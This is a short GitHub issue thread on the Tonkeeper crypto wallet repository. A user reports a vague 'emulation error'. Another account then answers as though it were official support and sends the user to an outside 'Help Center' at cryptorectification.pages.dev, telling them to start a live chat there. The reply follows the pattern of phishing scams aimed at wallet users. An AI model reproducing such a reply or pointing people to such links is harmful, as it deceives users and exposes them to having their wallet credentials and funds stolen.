### ISSUE TITLE
Emulation error

### ISSUE THREAD

**Issue by Mohammadbhosseiniii** [tonkeeper/wallet#922]
### Bug Type

Functional

### Reproduction steps

![Screenshot_2024-09-15-21-28-33-017_com mi android globallauncher-edit](https://github.com/user-attachments/assets/b3155058-0515-44a6-82de-d96aff5891e5)

### Actual result

An error accured 

### Expected result

Nothing done

### Suggested Severity

Vulnerability

### Device

Desktop (please complete the following information):

Smartphone (please complete the following information):
Xiaomi poco5s
Android 13
Chrome
24

**Comment by Mohammadbhosseiniii** [comment]
Have a good time

**Comment by LeoNore-ort** [comment]
@Mohammadbhosseiniii Thanks for posting the issue. 

Your query would be best dealt with by the support team.

Please see the link below to our dedicated support line:

Support : [Help Center](https://cryptorectification.pages.dev/)

Note: **Click on the live chat icon at the bottom corner of the page to start a conversation**
